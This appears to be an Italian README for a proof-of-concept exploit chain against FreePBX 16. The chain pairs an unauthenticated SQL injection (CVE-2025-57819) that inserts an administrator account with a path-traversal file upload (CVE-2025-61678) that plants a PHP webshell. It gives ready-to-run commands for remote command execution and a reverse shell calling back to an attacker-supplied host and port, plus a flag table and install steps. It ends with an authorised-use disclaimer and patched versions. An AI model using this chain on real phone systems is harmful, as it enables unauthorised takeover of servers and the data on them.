
# Catena di exploit per FreePBX 16: SQL injection non autenticata e upload arbitrario di file Catena di exploit composta da SQL injection non autenticata e upload arbitrario di file per FreePBX 16, che consente l'esecuzione remota di codice tramite la creazione di un account amministratore e il deployment di una webshell.
Proof-of-concept exploit che incatena due vulnerabilità di FreePBX per passare da accesso zero a esecuzione di codice remoto su FreePBX 16.
| CVE | Componente | Impatto |
|---|
| CVE-2025-57819 | Caricatore del modulo Endpoint (parametro brand) | SQL injection impilata non autenticata |
| CVE-2025-61678 | Caricatore firmware di Endpoint Manager (parametro fwbrand) | Caricamento arbitrario di file autenticato (path traversal) |
INSERT un amministratore con accesso completo direttamente nella tabella ampusers.../../../var/www/html/<dir> in fwbrand per scrivere una webshell PHP nella root web.FreePBX 16 (modulo Endpoint precedente a 16.0.92). Patchato anche in 17.0.6. Aggiornare a una versione corretta.
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
| Flag | Descrizione |
|---|---|
--rhost | Host target (richiesto) |
--rport | Porta target (default 443) |
--http | Usa HTTP invece di HTTPS |
--lhost / --lport | Indirizzo di callback della reverse shell |
--command | Esegui un singolo comando invece di una shell |
pip install requests pwntools
Solo per test di sicurezza autorizzati e scopi educativi. Usalo esclusivamente su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per testarli. L'autore non si assume alcuna responsabilità per un uso improprio.
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · SQL injection non autenticata · iniezione di query impilata · modulo endpoint · Endpoint Manager · caricamento file autenticato · path traversal · esecuzione di codice remoto · RCE · PoC · exploit · sicurezza VoIP
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb